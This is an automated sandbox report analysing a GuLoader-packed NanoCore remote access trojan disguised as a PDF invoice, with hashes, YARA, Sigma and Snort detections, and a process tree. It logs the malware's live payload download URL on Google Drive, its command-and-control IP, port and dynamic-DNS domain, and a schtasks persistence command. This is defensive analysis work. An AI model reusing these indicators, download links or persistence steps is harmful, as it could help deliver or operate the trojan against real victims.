Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exe

Overview

General Information

Sample Name:DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exe
Analysis ID:798398
MD5:91c0c4710db096a4689d40e2ceb3814d
SHA1:63880c602b960c5f91e55cbe4d5d18c7b8f1d63a
SHA256:a4d4961d124ea4276512c1584f1ebd30951cd469659b3a623594d6361772fae7
Infos:

Detection

Nanocore, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Sigma detected: NanoCore
Detected Nanocore Rat
Sigma detected: Scheduled temp file as task from temp location
Multi AV Scanner detection for dropped file
Yara detected GuLoader
Snort IDS alert for network traffic
Writes to foreign memory regions
Tries to detect Any.run
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses dynamic DNS services
Uses 32bit PE files
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64native
  • DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exe (PID: 2948 cmdline: C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exe MD5: 91C0C4710DB096A4689D40E2CEB3814D)
    • CasPol.exe (PID: 4376 cmdline: C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exe MD5: 7BAE06CBE364BB42B8C34FCFB90E3EBD)
    • CasPol.exe (PID: 7876 cmdline: C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exe MD5: 7BAE06CBE364BB42B8C34FCFB90E3EBD)
      • conhost.exe (PID: 872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • schtasks.exe (PID: 6764 cmdline: schtasks.exe" /create /f /tn "DSL Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp673D.tmp MD5: 478BEAEC1C3A9417272BC8964ADD1CEE)
        • conhost.exe (PID: 1760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • CasPol.exe (PID: 4756 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe 0 MD5: 7BAE06CBE364BB42B8C34FCFB90E3EBD)
    • conhost.exe (PID: 4456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000003.167512023875.0000000039142000.00000004.00000800.00020000.00000000.sdmpNanoCoreunknown Kevin Breen <kevin@techanarchy.net>
  • 0x2022:$a: NanoCore
  • 0x2047:$a: NanoCore
  • 0x20a0:$a: NanoCore
  • 0x1223d:$a: NanoCore
  • 0x12263:$a: NanoCore
  • 0x122bf:$a: NanoCore
  • 0x1f114:$a: NanoCore
  • 0x1f16d:$a: NanoCore
  • 0x1f1a0:$a: NanoCore
  • 0x1f3cc:$a: NanoCore
  • 0x1f448:$a: NanoCore
  • 0x1fa61:$a: NanoCore
  • 0x1fbaa:$a: NanoCore
  • 0x2007e:$a: NanoCore
  • 0x20365:$a: NanoCore
  • 0x2037c:$a: NanoCore
  • 0x23705:$a: NanoCore
  • 0x24abf:$a: NanoCore
  • 0x24b09:$a: NanoCore
  • 0x25763:$a: NanoCore
  • 0x2ad48:$a: NanoCore
00000008.00000003.167512023875.0000000039142000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Nanocore_d8c4e3c5unknownunknown
  • 0x2047:$a1: NanoCore.ClientPluginHost
  • 0x12263:$a1: NanoCore.ClientPluginHost
  • 0x1f3cc:$a1: NanoCore.ClientPluginHost
  • 0x24abf:$a1: NanoCore.ClientPluginHost
  • 0x2ad48:$a1: NanoCore.ClientPluginHost
  • 0x35357:$a1: NanoCore.ClientPluginHost
  • 0x3f782:$a1: NanoCore.ClientPluginHost
  • 0x4a75f:$a1: NanoCore.ClientPluginHost
  • 0x56501:$a1: NanoCore.ClientPluginHost
  • 0x7b405:$a1: NanoCore.ClientPluginHost
  • 0x8a845:$a1: NanoCore.ClientPluginHost
  • 0x2022:$a2: NanoCore.ClientPlugin
  • 0x1223d:$a2: NanoCore.ClientPlugin
  • 0x1f448:$a2: NanoCore.ClientPlugin
  • 0x24b09:$a2: NanoCore.ClientPlugin
  • 0x2adc2:$a2: NanoCore.ClientPlugin
  • 0x35441:$a2: NanoCore.ClientPlugin
  • 0x3f822:$a2: NanoCore.ClientPlugin
  • 0x4a736:$a2: NanoCore.ClientPlugin
  • 0x564d8:$a2: NanoCore.ClientPlugin
  • 0x7b3dc:$a2: NanoCore.ClientPlugin
00000002.00000002.167511188846.0000000008C46000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    Process Memory Space: CasPol.exe PID: 7876NanoCoreunknown Kevin Breen <kevin@techanarchy.net>
    • 0x4e6b:$a: NanoCore
    • 0x4e7f:$a: NanoCore
    • 0x54df:$a: NanoCore
    • 0x6c14:$a: NanoCore
    • 0x6c77:$a: NanoCore
    • 0x32355:$a: NanoCore
    • 0xf71c3:$a: NanoCore
    • 0xf71e8:$a: NanoCore
    • 0xf7241:$a: NanoCore
    • 0xfacdd:$a: NanoCore
    • 0xfad00:$a: NanoCore
    • 0xfad55:$a: NanoCore
    • 0x105e6c:$a: NanoCore
    • 0x105e90:$a: NanoCore
    • 0x105ee8:$a: NanoCore
    • 0x10d35e:$a: NanoCore
    • 0x10d3b7:$a: NanoCore
    • 0x10d3dd:$a: NanoCore
    • 0x10d773:$a: NanoCore
    • 0x10d7b7:$a: NanoCore
    • 0x10d7fa:$a: NanoCore
    Process Memory Space: CasPol.exe PID: 7876Windows_Trojan_Nanocore_d8c4e3c5unknownunknown
    • 0xf71e8:$a1: NanoCore.ClientPluginHost
    • 0xf71c3:$a2: NanoCore.ClientPlugin
    • 0xfab2b:$b1: get_BuilderSettings
    • 0xf71d9:$b4: IClientAppHost
    • 0x10f427:$b7: LogClientException
    • 0x11159d:$b8: PipeExists
    • 0xfeffe:$b9: IClientLoggingHost

    Unpacked PEs

    SourceRuleDescriptionAuthorStrings
    8.3.CasPol.exe.3914b6be.1.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth (Nextron Systems)
    • 0x6da5:$x1: NanoCore.ClientPluginHost
    • 0x6dd2:$x2: IClientNetworkHost
    8.3.CasPol.exe.3914b6be.1.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth (Nextron Systems)
    • 0x6da5:$x2: NanoCore.ClientPluginHost
    • 0x7d74:$s2: FileCommand
    • 0xc776:$s4: PipeCreated
    • 0x6dbf:$s5: IClientLoggingHost
    8.3.CasPol.exe.3914b6be.1.unpackMALWARE_Win_NanoCoreDetects NanoCoreditekSHen
    • 0x6d7f:$x2: NanoCore.ClientPlugin
    • 0x6da5:$x3: NanoCore.ClientPluginHost
    • 0x6d70:$i3: IClientNetwork
    • 0x6d95:$i5: IClientDataHost
    • 0x6dbf:$i6: IClientLoggingHost
    • 0x6dd2:$i7: IClientNetworkHost
    • 0x6de5:$i9: IClientNameObjectCollection
    • 0x6b02:$s1: ClientPlugin
    • 0x6d88:$s1: ClientPlugin
    8.3.CasPol.exe.3914b6be.1.unpackWindows_Trojan_Nanocore_d8c4e3c5unknownunknown
    • 0x6da5:$a1: NanoCore.ClientPluginHost
    • 0x6d7f:$a2: NanoCore.ClientPlugin
    • 0x6dbf:$b9: IClientLoggingHost
    8.3.CasPol.exe.39165717.0.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth (Nextron Systems)
    • 0x3831:$x1: NanoCore.ClientPluginHost
    • 0x386a:$x2: IClientNetworkHost
    Click to see the 12 entries

    Sigma Signatures

    AV Detection

    barindex
    Sigma detected: NanoCore
    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe, ProcessId: 7876, TargetFilename: C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\run.dat

    E-Banking Fraud

    barindex
    Sigma detected: NanoCore
    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe, ProcessId: 7876, TargetFilename: C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\run.dat

    Persistence and Installation Behavior

    barindex
    Sigma detected: Scheduled temp file as task from temp location
    Source: Process startedAuthor: Joe Security: Data: Command: schtasks.exe" /create /f /tn "DSL Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp673D.tmp, CommandLine: schtasks.exe" /create /f /tn "DSL Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp673D.tmp, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exe, ParentImage: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe, ParentProcessId: 7876, ParentProcessName: CasPol.exe, ProcessCommandLine: schtasks.exe" /create /f /tn "DSL Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp673D.tmp, ProcessId: 6764, ProcessName: schtasks.exe

    Stealing of Sensitive Information

    barindex
    Sigma detected: NanoCore
    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe, ProcessId: 7876, TargetFilename: C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\run.dat

    Remote Access Functionality

    barindex
    Sigma detected: NanoCore
    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe, ProcessId: 7876, TargetFilename: C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\run.dat

    Snort Signatures

    Timestamp:91.193.75.146192.168.11.203498498572810451 02/04/23-04:02:00.606308
    SID:2810451
    Source Port:3498
    Destination Port:49857
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.11.2091.193.75.1464985734982816766 02/04/23-04:02:49.236881
    SID:2816766
    Source Port:49857
    Destination Port:3498
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:91.193.75.146192.168.11.203498498572810290 02/04/23-04:02:33.039323
    SID:2810290
    Source Port:3498
    Destination Port:49857
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.11.2091.193.75.1464985734982025019 02/04/23-03:57:12.109194
    SID:2025019
    Source Port:49857
    Destination Port:3498
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:91.193.75.146192.168.11.203498498572841753 02/04/23-04:02:50.692460
    SID:2841753
    Source Port:3498
    Destination Port:49857
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.11.2091.193.75.1464985734982816718 02/04/23-04:02:19.821499
    SID:2816718
    Source Port:49857
    Destination Port:3498
    Protocol:TCP
    Classtype:A Network Trojan was detected

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Multi AV Scanner detection for submitted file
    Source: DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exeVirustotal: Detection: 45%Perma Link
    Source: DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exeReversingLabs: Detection: 47%
    Multi AV Scanner detection for dropped file
    Source: C:\Users\user\AppData\Local\Temp\subfolder1\Windowss.exeReversingLabs: Detection: 47%
    Source: C:\Users\user\AppData\Local\Temp\subfolder1\Windowss.exeVirustotal: Detection: 45%Perma Link
    Source: DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dllJump to behavior
    Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.11.20:49855 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 142.250.186.161:443 -> 192.168.11.20:49856 version: TLS 1.2
    Source: DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: CasPol.exe, 00000008.00000003.167512023875.0000000039142000.00000004.00000800.00020000.00000000.sdmp
    Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: CasPol.exe, 00000008.00000003.167512023875.0000000039142000.00000004.00000800.00020000.00000000.sdmp
    Source: Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: CasPol.exe, 00000008.00000003.167512023875.0000000039142000.00000004.00000800.00020000.00000000.sdmp
    Source: Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: CasPol.exe, 00000008.00000003.167512023875.0000000039142000.00000004.00000800.00020000.00000000.sdmp
    Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: CasPol.exe, 00000008.00000003.167512023875.0000000039142000.00000004.00000800.00020000.00000000.sdmp
    Source: C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exeCode function: 2_2_00406555 FindFirstFileW,FindClose,2_2_00406555
    Source: C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exeCode function: 2_2_00405A03 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,2_2_00405A03
    Source: C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exeCode function: 2_2_0040287E FindFirstFileW,2_2_0040287E
    Source: C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exeFile opened: C:\Users\userJump to behavior
    Source: C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
    Source: C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer ShortcutsJump to behavior
    Source: C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exeFile opened: C:\Users\user\AppDataJump to behavior
    Source: C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
    Source: C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior

    Networking

    barindex
    Snort IDS alert for network traffic
    Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49857 -> 91.193.75.146:3498
    Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49857 -> 91.193.75.146:3498
    Source: TrafficSnort IDS: 2841753 ETPRO TROJAN NanoCore RAT Keep-Alive Beacon (Inbound) 91.193.75.146:3498 -> 192.168.11.20:49857
    Source: TrafficSnort IDS: 2816718 ETPRO TROJAN NanoCore RAT Keep-Alive Beacon 192.168.11.20:49857 -> 91.193.75.146:3498
    Source: TrafficSnort IDS: 2810451 ETPRO TROJAN NanoCore RAT Keepalive Response 3 91.193.75.146:3498 -> 192.168.11.20:49857
    Source: TrafficSnort IDS: 2810290 ETPRO TROJAN NanoCore RAT Keepalive Response 1 91.193.75.146:3498 -> 192.168.11.20:49857
    Uses dynamic DNS services
    Source: unknownDNS query: name: masterpat0nms672ns.duckdns.org
    Source: Joe Sandbox ViewASN Name: DAVID_CRAIGGG DAVID_CRAIGGG
    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1GWkPMapRdWHnFBq8NG4QBMUUzbTsJcvy HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/gop7ht5qt6iu260mrr5822id2hevfvup/1675479375000/07900185898442636486/*/1GWkPMapRdWHnFBq8NG4QBMUUzbTsJcvy?e=download&uuid=5cfb3928-a799-4c74-b6f0-f4c0849b8739 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0c-b0-docs.googleusercontent.comConnection: Keep-Alive
    Source: global trafficTCP traffic: 192.168.11.20:49857 -> 91.193.75.146:3498
    Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: CasPol.exe, 00000008.00000003.167481132146.00000000071B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
    Source: CasPol.exe, 00000008.00000003.167481132146.00000000071B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
    Source: CasPol.exe, 00000008.00000003.167512023875.0000000039142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://google.com
    Source: DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exe, Windowss.exe.8.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
    Source: CasPol.exe, 00000008.00000003.167744785159.0000000007194000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-0c-b0-docs.googleusercontent.com/
    Source: CasPol.exe, 00000008.00000003.167744785159.0000000007194000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-0c-b0-docs.googleusercontent.com/H
    Source: CasPol.exe, 00000008.00000003.167744785159.00000000071ED000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000008.00000003.167744785159.0000000007194000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000008.00000003.167481132146.00000000071F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-0c-b0-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/gop7ht5q
    Source: CasPol.exe, 00000008.00000003.167744785159.000000000717A000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000008.00000003.167744785159.0000000007162000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
    Source: CasPol.exe, 00000008.00000003.167744785159.0000000007162000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1GWkPMapRdWHnFBq8NG4QBMUUzbTsJcvy
    Source: unknownDNS traffic detected: queries for: drive.google.com
    Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1GWkPMapRdWHnFBq8NG4QBMUUzbTsJcvy HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/gop7ht5qt6iu260mrr5822id2hevfvup/1675479375000/07900185898442636486/*/1GWkPMapRdWHnFBq8NG4QBMUUzbTsJcvy?e=download&uuid=5cfb3928-a799-4c74-b6f0-f4c0849b8739 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0c-b0-docs.googleusercontent.comConnection: Keep-Alive
    Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.11.20:49855 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 142.250.186.161:443 -> 192.168.11.20:49856 version: TLS 1.2
    Source: C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exeCode function: 2_2_004054B0 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageW,CreatePopupMenu,LdrInitializeThunk,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,2_2_004054B0

    System Summary

    barindex
    Malicious sample detected (through community Yara rule)
    Source: 8.3.CasPol.exe.3914b6be.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
    Source: 8.3.CasPol.exe.3914b6be.1.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
    Source: 8.3.CasPol.exe.3914b6be.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 8.3.CasPol.exe.39165717.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
    Source: 8.3.CasPol.exe.39165717.0.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
    Source: 8.3.CasPol.exe.39165717.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 8.3.CasPol.exe.39165717.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 8.3.CasPol.exe.39165717.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
    Source: 8.3.CasPol.exe.39165717.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 8.3.CasPol.exe.3915fce9.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 8.3.CasPol.exe.3915fce9.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
    Source: 8.3.CasPol.exe.3915fce9.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 8.3.CasPol.exe.3914b6be.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 8.3.CasPol.exe.3914b6be.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
    Source: 8.3.CasPol.exe.3914b6be.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 00000008.00000003.167512023875.0000000039142000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 00000008.00000003.167512023875.0000000039142000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: Process Memory Space: CasPol.exe PID: 7876, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: Process Memory Space: CasPol.exe PID: 7876, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
    Source: 8.3.CasPol.exe.3914b6be.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 8.3.CasPol.exe.3914b6be.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 8.3.CasPol.exe.3914b6be.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
    Source: 8.3.CasPol.exe.3914b6be.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 8.3.CasPol.exe.39165717.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 8.3.CasPol.exe.39165717.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 8.3.CasPol.exe.39165717.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
    Source: 8.3.CasPol.exe.39165717.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 8.3.CasPol.exe.39165717.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 8.3.CasPol.exe.39165717.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
